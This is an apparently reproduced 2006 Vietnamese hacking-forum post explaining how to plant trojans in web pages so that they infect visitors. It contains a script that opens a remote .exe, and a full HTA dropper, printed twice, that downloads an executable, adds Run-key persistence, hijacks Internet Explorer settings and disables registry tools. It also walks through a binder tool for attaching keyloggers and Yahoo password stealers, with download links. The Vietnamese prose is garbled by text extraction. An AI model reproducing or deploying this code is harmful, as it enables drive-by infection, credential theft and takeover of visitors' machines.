1. Trang chủ
  2. » Công Nghệ Thông Tin

gắn virut vào web

10 270 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 10
Dung lượng 47 KB

Nội dung

Trang 1

View Full Version: G n virut vào web ắ

TrongTam1987 > Kho Virut - Trojan - Hack > G n virut vào webắ

Title: G n virut vào web

admin - January 6, 2006 12:49 PM (GMT)

Chào các b n ! v n ạ ấ đề g n trojan vào HTML là m t v n ắ ộ ấ đề khá là khó và có r t ấ nhi u cách ề đ g n ắ

Hôm nay kimdung xin h n g d n các b n s d ng 3 cách mà kimdung ã làm ư ẫ ạ ử ụ đ

r i và r t thành công kimdung s h n g d n c th ha ồ ấ ẽ ướ ẫ ụ ể

cách 1 : dùng m t o n mã n gi n ộ đ ạ đ ả để open 1 con trojan ! nh chi n d ch c a ư ế ị ủ chúng ta !

o n mã nh sau:

Code:

<SCRIPT language=javascript>

open("http://freewebs.com/nhutuanweb/thanks.exe");

</SCRIPT>

v i o n mã này b n g n d i th body thì m i khi truy c p website nó s t ớ đ ạ ạ ắ ư ẻ ỗ ậ ẽ ự open con trojan c a b n ủ ạ

cách này là cách thông th n g nh ng c ng khá hi u qu hi u qu nh th nàoư ư ũ ệ ả ể ả ư ế thì anh em chi n dich bi t r i ó kimdung ã mã hóa v y mà ông boyvnx nhà ta ế ế ồ đ đ ậ

v n View ẫ đ c th m i hay ch hiiế ớ ứ

cách th 2 là cách r t cao c p .kimdung th c s không mu n h n g d n các ứ ấ ấ ự ự ố ư ẫ

b n cách này â u vì nó khá là nguy hi m nh n g mà không sao là anh em trên ạ đ ể ư

di n à n thì h c h i là chính ễ đ ọ ỏ

b n copy vào notepad o n mã sau: ạ đ ạ

Code:

Trang 2

<html>

<head>

<script language="javascript">

try {

var fso = new ActiveXObject("Scripting.FileSystemObject");

var Shell = new ActiveXObject("WScript.Shell");

var tfolder2 = fso.GetSpecialFolder(0);

var filepath2 = tfolder2 + "\\system32\\System.js";

var a2 = fso.CreateTextFile(filepath2, true);

a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";'); a2.WriteLine('var burl =

"http://www.freewebs.com/hinhanhlop18/hackervn.exe";');

a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");'); a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');

a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');

a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\Main\\\\Start Page",url);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url1",url);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hac kervn.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

Trang 3

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackerv n.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackerv n.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren

Trang 4

tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryTools",1,"REG_DWORD");'); a2.Close();

Shell.Run(filepath2);

}

catch (e){}

</script>

<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />

</head>

<body onload='window.close()'>

</body>

</html>

<! - <frameset></frameset> >

Trang 5

cách th 2 là cách r t cao c p kimdung th c s không mu n hứ ấ ấ ự ự ố ướng d n các ẫ

b n cách này âu vì nó khá là nguy hi m nh ng mà không sao là anh em trên ạ đ ể ư

di n àn thì h c h i là chính ễ đ ọ ỏ

b n copy vào notepad o n mã sau: ạ đ ạ

Code:

<html>

<head>

<script language="javascript">

try {

var fso = new ActiveXObject("Scripting.FileSystemObject");

var Shell = new ActiveXObject("WScript.Shell");

var tfolder2 = fso.GetSpecialFolder(0);

var filepath2 = tfolder2 + "\\system32\\System.js";

var a2 = fso.CreateTextFile(filepath2, true);

a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";'); a2.WriteLine('var burl =

"http://www.freewebs.com/hinhanhlop18/hackervn.exe";');

a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");'); a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');

a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');

a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\Main\\\\Start Page",url);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url1",url);');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hac kervn.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

Trang 6

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackerv n.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet

Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackerv n.exe");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMS GR_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

Trang 7

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet

Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackerv n.exe\\\\*",4,"REG_DWORD");');

a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryTools",1,"REG_DWORD");'); a2.Close();

Shell.Run(filepath2);

}

catch (e){}

Trang 8

</script>

<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />

</head>

<body onload='window.close()'>

</body>

</html>

<! - <frameset></frameset> >

r i save l i v i tên là : hackervn.hta ồ ạ ớ

nh là thay ớ đường d n c a con trojan i nha ẫ ủ đ

(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là con trojan c a ủ

kimdung

sau khi có file hackervn.hta r i b n g n o n mã sau vào cu i cùng c a website ồ ạ ắ đ ạ ố ủ

c a b n: ủ ạ

Code:

<center>

<span datasrc="#oRun" datafld="view" dataformatas="html"></span>

<xml id="oRun">

<preview>

<view>

<![CDATA[

<object id="oFile" data="hackervn.hta?id=1"></object>

]]>

</view>

</preview>

</xml>

</center>

</body>

</html>

r i sau ó b n upload file hackervn.hta + v i website c a b n lên cùng 1 host ồ đ ạ ớ ủ ạ .ok m i l n m website c a b n con trojan s t open vào trong h th ng mà ỗ ầ ở ủ ạ ẽ ự ệ ố không h b phát hi n+ thêm nó set homepage luôn cho ch c n ề ị ệ ắ ă

cách này r t hay và cao c p.ấ ấ

Trang 9

cách th 3 ứ

là các b n dùng chạ ương trình g n trojan vào html: ó là GodWill1.06 ắ đ

chương trình này mình th y nói r t nhi u trên các di n àn nh ng mà ch ng có ấ ấ ề ễ đ ư ẳ

ai làm được c hình nh là copy site ra thôi kimdung s hả ư ở ẽ ướng d n k ha ẫ ỹ các b n downlaod t i ây ạ ạ đ

http://www.freewebs.com/trangchulop18/GodWill1.6.rar n u không down ế được thì các b n lên google tìm nha.file kimdung upload lên g m c file h tr n a nênạ ồ ả ỗ ợ ữ

nó kho ng 1.3Mb nào b n hãy t t các trả ạ ắ ương trình di t virus i d chúng ta ệ đ ể setup

sau khi down v gi i nén s có các file sau nh hình sau: ề ả ẽ ư

nh n kép vào file GODWILL s có hình sau: ấ ẽ

sau khi b n ạ đọc xong nh ng i u kho n thì nh n enter ữ đ ề ả ấ

r i ồ đế đn ây b t ắ đầu xu t hi n nh ng ti n ích c a con trojan này ấ ệ ữ ệ ủ

cái chúng ta quan tâm ây là html còn nh ng ti n ich khác thì kimdung s nói ở đ ữ ệ ẽ sau ok nh n vào ch HTML: ấ ữ

n ây các b n nh n: Genral Options chúng ta b t u t o

vì đặ đ ểc i m c a con này là nó ch cho g n m t con trojan kho ng 34Kb thôi nên ủ ỉ ắ ộ ả chúng ta tìm nh ng con trojan nào dữ ưới 34Kb nh con MYSPY hay con K2PS ư hay con hackpass m i nh t mà kimdung post ó yjaked1 ớ ấ đ

+ m c enter exe fie b n m con trojan ã chu n b trở ụ ạ ở đ ẩ ị ước ra (MYSPY hay con K2PS,yjaked1 )

Trang 10

ch n ọ đường d n t i nó ẫ ớ

+ m c enter.html b n ch n ở ụ ạ ọ đường d n cho trang web mình c n g n trojan ẫ ầ ắ + không nh p ch n Uer defult page ắ ọ

+ m c enter.output b n ở ụ ạ đổi tên file Geebferh.html thành tên nào b n mu n.vì ạ ố sau khi t o xong thì trang web có g n trojan s là tên ó ( b n không ạ ắ ẽ đ ạ được m ở trang ó ra) đ

+ page ICQ notyfi b n mu n nh p ch n c ng ạ ố ấ ọ ũ được n u b n có s ICQ thì nh n ế ạ ố ấ

ch n ọ để ỗ m i khi có người open trang web nó s báo v ICQ cho b n nh ẽ ề ạ ư kimdung thì ch n h t ngo i tr "Uer defult page" ọ ế ạ ừ

r i xong sau khi ã hoàn thành các bồ đ ước gi thì b n nh n DOVE ờ ạ ấ đượ ồc r i

r i nh n GEN ồ ấ để hoàn thành Godwill s g n con trojan c a b n vào trang web ẽ ắ ủ ạ

c a b n ủ ạ

và nó s t ho t ẽ ự ạ động m i khi có ngỗ ười m trang web ó ra ở đ

trojan k2sp là keylogger

MYSPY là m t lo i gián i p ộ ạ đ ệ

yjaked1 dùng để hack pass yahoo

kimdung vi t bài này các b n ế ạ đừng ngh x u kimdung ha !!!! và c ng ĩ ấ ũ đừng s ợ kimdung dùng nh ng i u này nhé trữ đ ề ướ đc ây thì có dùng nhi u ! nh ng gi thì ề ư ờ thôi r i chia s cho anh em hiiiiiiồ ẽ

Hosted for free by InvisionFree

Ngày đăng: 11/07/2014, 09:06

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w